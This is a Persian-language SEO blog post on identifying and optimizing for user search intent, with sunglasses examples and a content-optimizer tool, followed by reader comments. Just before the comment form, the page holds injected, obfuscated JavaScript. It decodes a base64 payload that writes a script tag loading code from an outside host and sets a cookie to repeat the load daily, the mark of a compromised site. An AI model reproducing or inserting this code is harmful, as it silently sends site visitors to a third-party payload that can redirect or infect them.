2 دیدگاه
2019/12/29
1574 بازدید

چطور هدف جستجوی کاربر (user search intent) را شناسایی و بهینه سازی نماییم؟

آیا میدانید چرا مرغ از خیابان رد شد؟(Why did the chicken cross the road) شاید این سوال به ظاهر مضحک بیاید و حتی کسی هم جواب این سوال را نداند ولی اگر این سوال را در گوگل جستجو کنید به نتایج جالبی می رسید که خود من هم این سوال را در گوگل جستجو کردم و به نتایجی هم رسیدم که تصویر آن را در زیر برای شما گذاشتم.

تحقیق عبارتی در باکس جستج،ی گوگل

بعضی از سوالاتی که ما از موتورهای جستجو می پرسیم، به ظاهر مضحک و خنده دار هستند، اما گوگل و دیگر موتورهای جستجو به خاطر چیزی به نام هدف کاربر از جستجو یا همان user search intent، تمامی تلاش خود را میکنند که با توجه به جستجوهای کاربران و فهمیدن عباراتی که  دقیقا آن ها سرچ میکنند، نتایج مناسبی را ارائه دهند.

اگر شما متوجه قصد و نیت کاربران شوید و بفهمید که هدف آن ها از جستجو کردن چیست و یا با سرچ کردن به چه چیزی می رسند، در واقع، شما نیمی از راه را برای بررسی کلمات کلیدی یا همان keyword research ، طی کرده اید. البته کارهای بسیاری وجود دارد مانند اینکه با سه نوع از intent آشنا شوید و بررسی کنید که چه نوع محتوایی را برای هر یک از این اهداف و search intent، باید بنویسید و غیره. برای آشنایی با اهداف جستجوی کاربر و اینکه محتواها را چطور برای داشتن rank بهتر، بهینه نماییم تا کلمات کلیدی که ما برای ان ها محتوا نوشته ایم در لینک های اول گوگل باشند، لطفا این مقاله را تا انتها بخوانید.

هدف از جستجو یا Search Intent چیست؟

آیا میدانید نیت کاربران در سئو به چه معناست؟

آیا با انواع اهداف جستجوی کاربران آشنایی دارید؟

 چرا و چطور میتوان هدف جستجوهای اطلاعاتی یا informational را بهینه کرد؟

  آشنایی با قیمت و تعرفه سئو جهت بهینه سازی سایت ها

آیا میدانید نیت کاربران در سئو به چه معناست؟

در جواب این سوال باید به شما بگویم که، اگر در نتایج جستجو بخواهید در رتبه های بالا قرار بگیرید، باید از محتوایی استفاده کنید که  نه تنها بار علمی فوق العاده ای داشته باشد، بلکه باید به گونه ای باشد که در نتایج جستجوی گوگل بر اساس هدفی که کاربر به دنبال آن است، دیده شود. اگر محتواهایی که می نویسید، ویژگی های ذکر شده را ندارد، حتما باید تغییراتی را در آن ایجاد کنید، چرا که گوگل با آپدیت الگوریتم های خود، بیش از گذشته به مفاهیم عبارات جستجو شده اهمیت می دهد و حتی برای رسیدن به رتبه بالا در گوگل هم باید از این ترفند استفاده نمود، این نکته را هم فراموش نکنید که روزانه بیش از ۳.۵ میلیارد جستجو انجام می شود که اگر بتوانید محتوایی با کیفیت و کاربر پسند  بنویسید که گوگل آن محتوا را بر اساس اهداف کاربران در نتایج جستجو، نشان دهد، شما میتوانید در سریعترین زمان ممکن به جایگاه و درآمدی که مد نظرتان است برسید.

هدف کاربر از جستجو چیست

گوگل دقیقا می داند که شما چه می خواهید؛ پس طبق خواسته جستجوگران، مطالبی که  به دنبال آن میگردند را در نتایج جستجو نشان میدهد. مهمترین و بهترین کاری که شما میتوانید برای گرفتن رتبه در گوگل انجام دهید، نوشتن محتوا طبق user search intent می باشد.

آیا با انواع اهداف جستجوی کاربران آشنایی دارید؟

اجازه دهید برای درک این سوال، مثالی برای شما بیاورم. فرض کنید که کلمه کلیدی مورد جستجوی شما “عینک آفتابی” باشد؛ بر اساس این کلمه کلیدی، موتورهای جستجو از مفسرهای گوناگونی برای درک بهتر این کلمه استفاده میکنند و اهدافی که در پشت این کلمه است می تواند مطالب زیر باشد:

 • اطلاعاتی (informational): مثلا شما به دنبال معنی عینک آفتابی polarized می گردید.
 • ناوبری (navigational): مثلا شما به دنبال برند یا مارکی از عینک آفتابی خاصی می گردید.
 • معامله ای(transactional): مثلا شما به دنبال عینک آفتابی ارزان یا خرید عینک آفتابی هستید.

مطمئنا تا به الان شگفت زده شده اید که در پشت یک کلمه، چه مقدار معنی و هدف می تواند نهفته باشد. نکته جالبی که باید بدانید این است که  بیش از ۸۰ درصد از جستجوهای کاربران به صورت informational و ۲۰ درصد مابقی بین اهداف دیگر تقسیم شده است.

هدف کاربر از جستجو

آشنایی با هدف کاربر از جستجو به سال ۲۰۰۲  برمی گردد که توسط Andrei Broder برای اولین بار شناخته شده است.  Search intent، دارای سه دسته بندی است که در بالا به آن اشاره کردیم و همین  سه دسته بندی در راهنمای کیفی گوگل با کلماتی چون دانستن (know) ، انجام (Do) و برو(Go) شناخته شده است.

با وجودیکه با این سه دسته بندی آشنا شده اید، شاید از خودتان سوال بپرسید که چطور می توان تشخیص داد که هدف از عبارات مورد جستجو توسط کاربر چیست؟

یکی از ابزارهایی که میتوان با آن  search intent کاربران را مشخص کرد، استفاده از سایت cognitiveseo می باشد. با استفاده از این ابزار می توانید انواع هدف هایی که کاربران به هنگام جستجو به دنبال آن هستند را پیدا کنید و این ابزار درباره کلمات کلیدی مهم و سختی آن کلمات و از همه مهمتر درباره جایگاه آن کلمه در نتایج جستجو، است و  اطلاعاتی را به شما میدهد.

 چرا و چطور میتوان هدف جستجوهای اطلاعاتی یا informational را بهینه کرد؟

جستجوهایی که بر پایه informational هستند، موضوعات بسیار گسترده ای را تحت پوشش خود قرار میدهند که توسط آن ها می توانید نتایج بسیار زیاد و مرتبطی را مشاهده نمایید. مثلا اگر عبارت “بهترین برندهای رژگونه”  یا “مهمترین لیست لوازم آرایشی عروس کدام است” را سرچ کنید، می توانید به نتایج فوق العاده ای برسید. تصاویر زیر گویای سرچ های گفته شده می باشد که سایت ویکی دمی این عبارات را برای سایت مو تن رو بهینه نموده است.

مثال هایی از اهداف جستجوهای کاربران

همانطور که گفته شد، این نوع جستجو از سخت ترین نوع جستجوها است که باید هدف اصلی کاربر از این جستجو را درک کنید و سپس برای او محتوایی بنویسید. به نظر شما چه نکته ای برای بهینه سازی آن ها وجود دارد؟

عموما گوگل برای چنین عناوینی، راه حل های مخصوصی دارد  مانند answer box ، استفاده از گراف یا ریچ اسنیپت ها و غیره که توسط آن ها میتوان این نوع جستجو را تشخیص داد. از مهمترین کلماتی که برای چنین جستجوهایی انجام میشود، می توان به موارد زیر اشاره کرد:

 • من چطور می توانم
 • چه چیزی هست
 • چطور
 • مزایای آن چیست
 • راهنما
 • آموزش
 • راهکارها

حال بعد از آشنایی با سوالات بالا، باید بتوانید برای هر یک از این سوالات، محتوایی با توجه به کلمه کلیدی خود بنویسید. چطور یک محتوا را برای انواع هدف های کاربران بهینه نماییم؟

  راهکارهای سئو و بهترین تکنیک های سئو در سال 2021

برای درخواستهای اطلاعاتی چه نوع محتوایی باید ایجاد کنید؟

کاربران می خواهند چیزی را “بدانند” بنابراین از کلماتی استفاده می کنند که به آنها کمک می کند درباره آن موضوع، بیشتر اطلاع پیدا کنند.

“فرمولی” که باید هدف قرار دهید ، پرسش اطلاعاتی + اصطلاح صنعت شما است.

بیایید به عنوان مثال از جایگاه عینک آفتابی استفاده کنیم. در این حالت ، ممکن است بخواهید “عینک آفتابی چه فوایدی دارد” یا “نحوه تمیز کردن عینک آفتابی” را بهینه کنید. شما پرسش اطلاعاتی (آنچه چیست ، نحوه انجام ، چیست و غیره) + اصطلاح صنعت خود را دارید (در مورد ما ، عینک آفتابی)

در زیر می توانید تصویری از چگونگی به نظر رسیدن Google SERP برای سوال “what are the benefits of sunglasses” را مشاهده کنید. همانطور که می بینید ، اولین نتیجه ، در موقعیت صفر یک پاسخ مستقیم است و لیستی از مزایای استفاده از عینک آفتابی را دارد. این قسمت از مطالب مستقیماً به هدف جستجوی کاربر پاسخ می دهد. همانطور که در تصویر زیر مشاهده می کنید ، در سمت راست وب سایت وجود دارد. محتوای آن ساده است ، اما کاملاً به نیاز کاربر پاسخ می دهد.

what-are-the-benefits-of-sunglasses-google-first-result

موثرترین انواع محتوا برای جستجوی اطلاعاتی باید شامل موارد زیر باشد:

 • پست های وبلاگ با راهنمایی ، لیست
 • چگونه فیلم ها
 • اینفوگرافی
 • راهنماهای گام به گام
 • چک لیست ها

 هدف اصلی شما، باید ایجاد محتوای با کیفیت بالا باشد که مفید باشد و اطلاعات مفیدی را در رابطه با سوالتان ارائه دهد. به خاطر داشته باشید که کاربران، اطلاعات عملی و پاسخ مستقیم می خواهند و از طریق محتوایی که ایجاد می کنید هم می توانید نیازهای کاربران خود را تامین کنید و هم ترافیک سایت خود را افزایش دهید. برای داشتن ارزش افزوده ، محتوای بهینه شده برای هدف جستجو ایجاد کنید.

نحوه ایجاد محتوای مناسب برای هدف کلمه کلیدی اطلاعاتی

  مرحله 1. یک تجزیه و تحلیل سریع در Google SERP انجام دهید

هر فرآیند تحقیق یا بهینه سازی محتوای کلمات کلیدی، باید با تجزیه و تحلیل SERP به همراه تجزیه و تحلیل رقبا آغاز شود. با استفاده از ابزار بهینه ساز محتوا، می توانید به اطلاعات زیادی درباره کلمات کلیدی خود و رقبا دست یابید. سریع و آسان، شما می توانید حجم جستجو را بفهمید، چه نوع محتوایی در آن کلمه کلیدی رتبه بندی می شو ، رتبه بندی در آن کوئری، دشوار است و همچنین محبوبیت آن کلمه کلیدی در بین جستجوگران چه مقار است. همچنین، این ابزار به شما ایت امکان را می دهد از کلمات کلیدی و پیوندهای دقیق آن صفحه در نتایج برتر Google مطلع شوید تا محتوای خود را به راحتی بهینه کنید.

ranking-analysis-content-optimizer-and-focus-keywords-

مرحله 2. ایجاد محتوای مرتبط و بهینه شده

به یاد دارید وقتی به شما گفتم بهینه ساز محتوا بیشتر کار را برای شما انجام می دهد؟ من می دانم که مغرضانه گفته امو نمی خواهم خیلی از این ابزار تعریف کنم اما واقعیت این است که بیشتر کارها را برای شما انجام می دهد. هنگامی که تجزیه و تحلیل رتبه بندی را انجام دادید ، آنچه شما باید انجام دهید این است که شروع به نوشتن محتوای جدید یا بهینه سازی محتوای موجود کنید و دستیار محتوا به شما اطلاع می دهد که کلمات کلیدی دقیق مورد نیاز شما برای استفاده چیست تا محتوای شما برای جستجوی اطلاعاتی مرتبط باشد. 

how-to-clean-your-sunglasses-informational-search-intent-

مرحله 3. کلمات کلیدی و فرصت های رتبه بندی جدید را دریافت کنید

همچنین می توانید از cognitive SEO Content Optimizer برای کشف سایر سوال هایی که ممکن است کاربران به آنها علاقه مند باشند استفاده کنید. جستجوگران در مورد محصولات مربوط به تجارت شما بیش از یک سوال دارند. از فرصت استفاده کرده و مطالب مرتبط را برای بیشتر سوالاتشان به  آنها ارائه دهید. برای این کار می توانید از همان Content Optimizer استفاده کنید. این ابزار دارای دو بخش است که به طور خودکار به شما اطلاع می دهد که سایر سوالات مربوط به جستجوی شما گدام است”

Keyword Explorer – این بخش برای تجزیه و تحلیل کلمات کلیدی و کشف فرصت های جدید کلمات کلیدی بسیار مناسب است. همچنین این امکان را به شما می دهد که فقط پیشنهادات سوال را ببینید. از لیست سوالات الهام بگیرید ، مرتبط بودن سال، حجم آن، CPC (هزینه هر کلیک) را بررسی کنید و سوالی را انتخاب کنید که مناسب ترین و سودآورترین باشد.

keyword-explorer

نحوه بهینه سازی برای Navigational Search Intent

 با یک پرسش ناوبری ، کاربر به دنبال دستیابی به وب سایت، محصول یا خدمتی خاص است که قبلاً از آن اطلاع داشته است. در این حالت، احتمالاً فقط یک وب سایت وجود دارد که آنها به دنبال دسترسی به آن هستند.

به احتمال زیاد، کاربر در حال جستجوی اصطلاحات تجاری یا نام محصولات یا خدمات شناخته شده قبلی است: ورود به سیستم در فیس بوک، آمازون، دیجیکالا و غیره. ممکن است فکر کنید که چرا این موارد را باید جستجو کند و چرا کاربر به طور مستقیم به وب سایت اصلی مراجعه نمی کند؟ یک دلیل می تواند این باشد که کاربر مارک دقیق را نمی داند یا اینکه به جای تایپ کردن کل URL، تایپ کردن “youtube” در نوار جستجو آسان تر است.

برای مواردی که کاربر مستقیماً به URL دسترسی پیدا نمی کند ، باید بدانید که سوالات جستجوی ناوبری شامل موارد زیر است:

 • نام تجاری
 • خدمات / نام محصول
 • ورود به سیستم برند
 • بررسی ها
 • محل
 • دستورالعمل ها به
 • نزدیک من
 • ساعتها
 • هزینه
 • توصیفات

 یک بار دیگر ، ممکن است فکر کنید که بهینه سازی برای این نوع سوالات چه فایده ای دارد، زیرا کاربر می داند دقیقاً چه چیزی را جستجو می کند و Google نام تجاری جستجو شده توسط کاربر را در بالای SERP لیست می کند.

اگرچه درست است که شما شانس زیادی برای هدف قرار دادن یک سوال ناوبری ندارید (مگر اینکه به طور تصادفی صاحب سایتی شوید که فرد به دنبال آن است) ، اما ممکن است فضای بهینه سازی برای سوالات ناوبری وجود داشته باشد.

 به چه نوع محتوایی برای سوالات ناوبری نیاز دارید؟

 “فرمولی” که باید هدف قرار دهید ، نام تجاری خود یا جستجوی ناوبری + نام تجاری خودتان است.

به عنوان مثال: عینک آفتابی Ray Ban ، فیلم ارائه عینک آفتابی Ray Ban و غیره

برای اطمینان از پاسخگویی به نیازهای کاربر ، این نوع محتوا باید هنگام جستجوی ناوبری مناسب باشد:

 • پاک کردن صفحات فرود و فرم های آنلاین 
 • فیلم های آزمایشی محصول
 • مطالعات موردی
 • کتابهای الکترونیکی
 • صفحات ارائه
 • لیست محصولات و خدمات
 • وبینارها
 • یا هر نوع محتوایی که مربوط به کلمات کلیدی ناوبری شما باشد

 برای مثال، بیایید جستجو “نام تجاری” را انجام دهیم. همانطور که بهینه ساز محتوا قبلاً به ما گفته است، این یک سوال ناوبری است ، زیرا ممکن است کاربر بخواهد به brandmentions.com دسترسی پیدا کند. با این حال ، همانطور که در نتایج جستجو مشاهده می کنید ، بسیاری از صفحات دیگر نیز با هدف قرار دادن “نام تجاری” به عنوان موضوعی که ممکن است کاربران بخواهند درباره آن اطلاعات بیشتری کسب کنند ، رتبه بندی خوبی برای این پرسش دارند.

brandmentionsفقط با نگاهی به تجزیه و تحلیل SERP می توانید به راحتی درک کنید که کل تصویر برای این پرسش چگونه است.  اگرچه نمی توانید رتبه بندی اصلی مارک را برای نام تجاری آن سرنگون کنید، اما ممکن است خود را در صفحه اول پیدا کنید.

brandmentions-serpجنبه مهم دیگر در اینجا این است، مطمئن شوید که پرسش ناوبری برند خود هستید. اگرچه سورئال به نظر می رسد، اما ممکن است شرایطی وجود داشته باشد که خود برند، برای درخواست ناوبری خود در رتبه اول قرار نگیرد. همچنین، اطمینان حاصل کنید که برای همه “نسخه های” نام تجاری خود، بهینه سازی را انجام داده اید مانند (املای مختلف، غلط نوشتاری رایج، تنظیمات نام تجاری در کشورهای مختلف و غیره)

علاوه بر این ، در بالا ذکر کردیم که انواع هدف جستجو باید بیشتر از یک جستجوی منفرد به عنوان یک چرخه دیده شود. و این همان چیزی است که ما در مورد آن صحبت می کنیم: ماندن در منطقه عینک آفتابی ، اگر کسی با جستجوی “نحوه تمیز کردن عینک آفتابی” یک محصول خاص پیدا کند که به تمیز کردن کمک می کند، به احتمال زیاد آنها Windex را جستجو خواهند کرد.

نحوه ایجاد محتوای مناسب با هدف کلمات کلیدی پیمایشی

همانطور که قبلاً ذکر شد ممکن است بگویید، در هدف گیری یک سوال ناوبری، شانس زیادی ندارید (مگر اینکه به طور اتفاقی صاحب سایتی شوید که فرد به دنبال آن است) که هنوز جای پیشرفت دارد. بنابراین ، به شما توصیه می کنیم برای ایجاد محتوای مرتبط و بهینه سازی ، مراحل ذکر شده در بالا را دنبال نمایید. 

نحوه بهینه سازی برای هدف جستجوی معامله ای

با یک جستجوی معامله ای، کاربران به دنبال خرید یک محصول هستند که همه این موارد، به اهداف تجاری  آن ها متصل است. این، یک پرس و جو است که نشان می دهد قصد انجام معامله ای از قبیل خرید ، یافتن مکانی برای خرید یا انجام یک کار را دارید. به عنوان مثال: iphone x ، دستگاه قهوه ساز Saeco از کجا خریداری شود ، بلیط های فروشی Metallica و غیره.

جستجوگران برای رفتن به صفحاتی که می توانند خرید کنند، از کلمات کلیدی که بیانگر خرید یا معامله است استفاده می کنند که نمونه ای از آن به شرح زیر است:

 • خرید
 • از کجا بخریم
 • تخفیف
 • درخواست دادن
 • خریداری
 • کوپن
 • قرار ملاقات بگذارید
 • ذخیره
 • معاملات
 • برای فروش
 • سفارش
 • دانلود

برای سوالات معامله ای به چه نوع محتوایی نیاز دارید؟

 برای آنکه شما، ROI خود را به هنگام جستجو انتقال دهید، باید از محتوایی استفاده نمایید که بتواند به جستجوهای معامله ای و transactional نیز پاسخ دهد.

فرمولی که باید  مورد هدف شما باشد، این است: کلمات کلیدی معاملاتی + مارک / محصول / نام خدمات / شرایط صنعت.

به عنوان مثال: عینک آفتابی ray ban  تخفیف دار یا عینک آفتابی با ray ban را از کجا بخریم.

 به راحتی می توانید با انواع مختلفی از محتوای بهینه شده یا حتی پست های وبلاگ یا صفحات بهینه شده برای سئو محلی، سوالات معاملاتی را هدف قرار دهید.

ما توصیه می کنیم که برای سوالات معاملاتی خود، محتواهای زیر را به بهترین نحو بهینه سازی نمایید:

 • صفحات محصول
 • صفحات قیمت گذاری
 • ثبت نام در صفحات
 • دموی زنده
 • صفحات ملاقات ها
 • مشاوره رایگان
 • صفحات فروش

اکنون بیش از هر زمان دیگری، Google متمرکز بر ارائه تجربه شخصی برای هر کاربر و هدف جستجوی وی است، بنابراین بهینه سازی محلی نقشی اساسی در این بازی دارد. وقتی نوبت به هدف جستجوی تراکنشی می رسد، ممکن است بخواهید بخاطر داشته باشید که بهینه سازی محلی بسیار مهم است. افراد به دنبال مکان هایی برای خرید چیزها هستند، آنها می خواهند قرار ملاقات هایی را ترتیب دهند تا آنجا باشند، در نتیجه وقتی جواب سوال خود را در ابتدای جستجوها پیدا می کنند، بسیار خوشحال خواهند بود و در آینده، به سایت شما نیز بیشتر مراجعه می کنند. بنابراین ، سعی کنید بهینه سازی را نیز در سطح محلی انجام دهید. از همان بهینه ساز محتوا می توان برای مکان های دقیق استفاده کرد، بنابراین مکان دقیق مورد نظر برای رتبه بندی را انتخاب کنید و ببینید برای رتبه بندی در نتایج برترGoogle، چه چیزی لازم است.

از کجا عینک آفتابی بگیریمالبته، ارائه محتوای مرتبط و بهینه در سطح محلی، تنها یکی از راهکارها در مورد اهداف جستجوی معاملات است. تجزیه و تحلیل SERP را انجام دهید و بررسی کنید که رقبا چه کاری انجام می دهند. ببینید برای رتبه بندی در بالا چه کاری لازم است و نیاز کاربر را درک کنید.

نحوه ایجاد محتوای مناسب برای هدف کلمه کلیدی معامله ای

به خاطر داشته باشید که در این مرحله از search intent با استفاده از سوالات جستجوی معاملات، کاربر آمادگی خود را برای خرید اعلام کرده است. و بیشتر نتایج جستجو که با این سوالات نشان داده می شود، مربوط به فروشگاه های آنلاین است که کالایی را که مشتری می خواهد بخرد می فروشند. اطمینان حاصل کنید که محتوای موجود شما از قصد کاربر، پشتیبانی می کند. آنچه در اینجا به آن نیاز خواهید داشت صفحات محصول خواهد بود. 

چالش تطبیق هدف جستجو

 مهم است، به خاطر داشته باشید که هدف جستجو ثابت نیست. به جستجوی “آمازون” بیندیشید  9 جستجو از 10 مورد، احتمالاً ناوبری خواهد بود. اما در طی یکی دو هفته گذشته، ممکن است تعداد زیادی از جستجوها اطلاعاتی بوده باشند. برای درک بهتر، باید از snippet های خبری یا پست های رسانه های اجتماعی در مورد آتش سوزی در جنگل آمازون و غیره استفاده شود.جعبه های پاسخ SERP نیز متناسب با هدف به نظر می رسند. ممکن است توضیحاتی برای یک سوال اطلاعاتی و لیستی از صفحات خرید برای یک سوال معاملاتی نیز دریافت کنید. 

به احتمال زیاد، “فیس بوک”، به عنوان مثال، همیشه با شبکه اجتماعی مرتبط است و به تنهایی، همیشه هدف اصلی آن ناوبری بوده است. با این حال، سایر کلمات کلیدی معمولاً با یک هدف واحد در ارتباط نیستند. این می تواند دقیقاً همان فرصتی باشد که ممکن است برای شخصی که در صنعت SEO کار می کند جذاب باشد. این نکته را به یاد داشته باشید که محتوا، سرنخ تمامی انواع جستجوها خواهد بود و باید محتوا را طوری بنویسید که بتواند با هر نوع سوال و جستجویی، بتواند به هدف خود برسد.

وقتی نوبت به قالب و ساختار می رسد ، شما می خواهید روند را پیش ببرید و کارهایی را که دیگران انجام می دهند انجام دهید، زیرا این همان چیزی است که ثابت شده است که به نتیجه می رسد (نتایج جستجو ، به طور دقیق تر). با این حال، وقتی صحبت از زاویه می شود، وقت آن است که اصیل باشید. قالب و ساختار شما باید در صفحه اول گوگل  قرار گیرد. زاویه می تواند در موقعیتی که در رتبه بندی نشان می دهید تأثیرگذار باشد.

5 نکته طلایی برای پیروزی در نتایج گوگل با قواعد search intent

 • بهینه سازی محتواهای قدیمی

به تولید محتوای جدید با معیار هدف جستجو کاربر اکتفا نکنید. شما میتوانید پست بلاگ های قبلی سایت را بازنگری کنید و تمام فاکتورهایی که میدانید برای پیاده سازی بهترین هدف جستجو کاربر نیاز است را برای محتواها انجام دهید. قطعاً با در نظر گرفتن تکنیک search intent رتبه پست بلاگ های سایت افزایش چشمگیری در نتایج گوگ خواهند داشت.

 • استفاده از تصویر و ویدئو

بدون شک شما هم از قدرت رسانه های تصویری برای فهماندن بهتر موضوع یک محتوا با خبر هستید؟ با تهیه ویدئو و تصاویر متناسب با عنوان پست بلاگ ها میتوایند هم تجربه کاربری بهتری را برای مخاطبین سایت خود ایجاد کنید و هم یک قدم برای رسیدن به هدف جستجو کاربر نزدیک شوید.

 • توجه به کامنت ها

بخش پرسش و پاسخ هایی که در کامنت یک صفحه محتوا ایجاد میشود، بهترین سرنخ برای تولید محتوای جدید پیرامون سوالات و اشکالاتی است که کاربران در رابطه با یک موضوع برایشان ایجاد میشود. بنابراین با پرداختن به این موضوعات و اپدیت محتوا برای پاسخ دهی به سوالات، میتواند کاربران جدیدی به سمت سایت و بلاگ تان هدایت کند.

 • آنالیز و تحلیل نتایج SERP گوگل

بدون شک برای اینکه بهترین نتیجه را از کار و زحمت خود از تولید محتوای بگیرید باید حتما صفحه نتایج گوگل را برای عبارت کلیدی در نظر بگیرید و رقبا را در لینک های اول تا دهم بررسی کنید. البته این نکته را در نظر بگیرید که رتبه‌ بندی سایت‌ ها توسط گوگل روز به روز دحال تغییر است و معیارهای سختی بر روی این سایت ها اعمال میشود. اما بهترین نتایج را در یک عبارات خاص با دقت در نظر داشته باشید و با جزئیات بیشتری تجزیه و تحلیل کنید. این تنها راه درک واقعی برای آنچه که مردم می خواهند ببینند، و در نتیجه آنچه که محتوای شما باید در مورد آن صحبت کند، است.

 • توجه به نوع و کیفیت محتوا

برای اینکه بتوانید یک محتوای مناسب با هدف جستجو کاربر تولید کنید باید سه ویژگی نوع محتوا، فرمت محتوا و زاویه دید محتوا را برای مطالبتان در نظر بگیرید.

نوع محتوا: برای نوع محتوا شما باید توجه کنید که کاربر با توجه به سرچی که انجام داده چه نوع محتوایی مثل محتوای پست بلاگ، محتوای کتگوری یا محتوای محصول برایش مناسب است و کدام نوع نیازش را بر طرف میکند.

فرمت محتوا: منظور از این ویژگی برای یک مطلب این است که با چه روشی میخواهید موضوع یک مقاله را تهیه کنید. آیا قرار است محتوای یک آموزش قدم به قدم و عملی باشد یا قرار است محتوا به صورت مقایسه ای باشد و چندین برند یا محصول رو باهم مقایسه کنید و از آن نتیجه گیری کنید.

زاویه دید محتوا: با در نظر گرفتن اینکه محتوا با جستجو کلمات کلیدی یا عبارت به دنبال چه موضوعی است و قرار است چه محتوایی رو ببیند تا نیازش بر طرف شود. درواقع خواندن ذهن مخاطب برای پیدا کردن هدف جستجو یکی از نکات طلایی برای رسیدن به نتیجه دلخوه برای رضایت مندی کاربران یک وبسایت است. برای مثال اگر عبارت آموزش سئو مقدماتی را دز نظر بگیرید شما میتوانید به موضوعاتی همچون بهترین آموزش سئو ، آموزش سئو در تهران ، آموزش سئو حرفه ای و یا حتی آموزش سئو ارزان را هم پوشش دهید.

برای چه نوع هدف جستجو، باید بهینه سازی را شروع کنید

مردم دیگر فقط یک مسیر خطی را از آگاهی تا ملاحظه برای خرید دنبال نمی کنند. گوگل این مدل ذهنی را اصلاح کرد و لحظه صفر حقیقت (ZMOT) را اضافه کرد. در واقع، این واقعیت را در نظر میگیرد که تصمیمات خرید، اکنون به شدت تحت تأثیر تحقیقات آنلاین خودگردان هدایت می شوند. برای بهینه سازی هدف جستجو، باید به دنبال آنچه مشتریان در تلاش برای دستیابی به آن هستند، باشیم. بدانید کدام قانون را باید رعایت کنید و کدام یک را نقض کنید.

قصد جستجو باید نوع محتوای شما را تعیین کند.

اگر کلمه کلیدی شما به منظور اطلاع رسانی ایجاد شده است، باید  یک پست وبلاگ بنویسید. اگر قصد معامله دارید، یک صفحه محصول ایجاد کنید. رتبه بندی Google ثابت نیست. آنها با گذشت زمان، تغییر می کنند. با توجه به اینکه برای استنباط قصد جستجو، به ماهیت صفحات رتبه بندی کنونی اعتماد می کنید، این می تواند یک مشکل باشد. دلیل بودن برای کاری که شما در واقع انجام می دهید قضاوت در مورد قصد جستجو بر اساس یک عکس فوری در زمان است.

اگر قرار است ماه آینده یا ماه بعد، صفحات دارای رتبه برتر را تجزیه و تحلیل کنید، ممکن است درک شما از هدف جستجو متفاوت باشد. به همین دلیل، جستجوی کلمات کلیدی و به روزرسانی محتوا نیز می تواند تا حدود زیادی برای شما هزینه در بر داشته باشد. درک هدف جستجو و سازگاری با آن می تواند فواید بی شماری به همراه داشته باشد. فقط به ذکر چند مورد:

 این می تواند نرخ گزاف گویی شما را کاهش دهد

 فقط افرادی که به آنچه شما ارائه می دهید علاقه مند هستند و در صفحات شما قرار می گیرند و برای دریافت اطلاعات بیشتر نیز می مانند. اما این به معنای کاهش بازدید نیست. برعکس، هنگامی که بین تقاضا (نیاز به جستجوها) و پیشنهاد مطابقت داشته باشد، به احتمال زیاد بیشتر در رتبه بندی ظاهر می شوید.

همچنین احتمالاً مخاطبان گسترده تری پیدا خواهید کرد، زیرا Google اغلب بین انواع مختلف پرس و جوها مطابقت پیدا می کند ، بنابراین رتبه بندی بالا برای مجموعه ای از کلمات کلیدی، احتمالاً امکانات جدیدی را برای موارد مرتبط ایجاد می کند.

بفهمید چه چیزی ارائه می دهید و چگونه با هدف کاربران مطابقت دارد

 در مرحله اول ، شما باید بفهمید صفحه شما مخفف چه چیزی است، آیا بیشتر اطلاعاتی است یا معامله ای؟ اگر هر دو را بخواهید، ممکن است مجبور باشید از قالب های مختلف (وب سایت و وبلاگ) و ساختار بسیار متفاوت برای پست های خود استفاده کنید. همچنین باید در نظر داشته باشید که چگونه می توان به بهترین وجه این دو را به هم پیوند داد تا از یک طرف آسان باشد و از طرف دیگر، گوگل فکر نکند شما می خواهید  فقط کاربران را به سمت سایت خود جذب کنید و داده ای را به آن ها انتقال ننمایید.

از این دانش برای جستجوی فرصت ها و موقعیت های خاص استفاده کنید

 درباره کلمات کلیدی و چگونگی ارتباط آنها با قصد جستجوی کاربر، تحقیق کنید. سعی کنید ببینید آیا کلمات کلیدی مورد علاقه شما باید پایدار یا متغیر باشند. برای یک هدف خاص، چه اطلاعاتی، چه معامله ای و چه تحقیقاتی،  نیاز است و باید با چه نوع کلماتی نیز آشنا شد. ببینید چه کلمات کلیدی دیگری ممکن است نه تنها با همان پرسش بلکه با همان هدف همراه باشند. سعی کنید خلا رقبا را شناسایی کنید و محتوایی ایجاد کنید که این خلا ها را پر کند. آگاه باشید که قصد کاربر، می تواند فعال و منفعل باشد و پیش بینی قصد منفعل بسیار دشوارتر است. یک جستجو، ممکن است شامل هیچ یک از کلمات سنتی مربوط به خرید یا قیمت گذاری نباشد، اما همچنان یک نیاز معاملاتی را پنهان می کند.

پشت هر جستجوی گوگل ، یک قصد وجود دارد. اگر می خواهید تجارت شما توسط کاربران در وب کشف شود، باید این هدف را دریابید. و اگر درک آن برای شما دشوار است، جای نگرانی نیست زیرا به همین دلیل ابزارهایی مانند Content Optimizer در بازار وجود دارند تا به شما کمک کنند.

برای دریافت اطلاعات بیشتر، می توانید با شماره 09128909248 تماس حاصل نمایید. لطفا نظرات خود را در دیدگاه برای ما ارسال نمایید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

دو × دو =

2

 1. آریاناپکینگ

  عالیه مطالبتون ممنون

  07 مارس 2021 پاسخ
  • مهرناز نیک مرام

   ممنون از شما

   08 مارس 2021 پاسخ